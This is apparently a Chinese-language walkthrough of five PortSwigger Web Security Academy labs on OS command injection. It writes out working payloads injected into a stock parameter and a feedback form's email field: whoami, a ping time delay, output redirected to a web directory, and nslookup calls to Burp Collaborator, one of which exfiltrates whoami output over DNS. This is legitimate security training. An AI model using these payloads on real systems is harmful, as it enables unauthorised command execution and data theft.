这是BurpSuit官方的实验室靶场,以下将记录个人命令注入共5个Lab的通关过程
Web Security Academy: Free Online Training from PortSwigger
OS command injection, simple case
操作系统命令注入,简单情况
找到了product/stock接口
在参数后加;whoami或者|whoami

Blind OS command injection with time delays
具有时间延迟的盲操作系统命令注入
有一个反馈界面

点击提交反馈,发送如下请求包

在email后加入||ping+-c+10+127.0.0.1||延迟10s

Blind OS command injection with output redirection
带输出重定向的盲操作系统命令注入
还是反馈页面,这次是重定向
email中加入||whoami>/var/www/images/tpa1.txt||

访问如下静态页面

成功获得whoami

Blind OS command injection with out-of-band interaction
带外交互的盲操作系统命令注入
开启 Burp Collaborator
emai后加||nslookup+i1kvr4nt6vbxx0nevocnxy2qmhs8gx.burpcollaborator.net||DNS地址

Blind OS command injection with out-of-band data exfiltration
带外数据渗透的盲目操作系统命令注入
email加||nslookup+whoami.ek2qiy6xgp12mh15lgrgk8m85zbpze.burpcollaborator.net||
注意whoami左右要加`
